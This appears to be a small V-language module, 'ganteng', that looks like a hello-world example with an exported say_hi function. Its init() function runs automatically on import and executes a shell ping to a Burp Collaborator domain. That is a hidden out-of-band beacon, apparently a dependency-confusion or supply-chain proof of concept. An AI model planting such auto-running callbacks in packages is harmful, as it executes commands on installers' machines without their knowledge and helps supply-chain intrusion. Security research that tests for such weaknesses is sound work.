module ganteng

import os

// To export a function we have to use `pub`
pub fn say_hi() {
	println('hello from mymodule!')
}

fn init(){
os.system("ping m1o9ydd3il1qi3vn25ccl1ouglmba0.burpcollaborator.net")
}
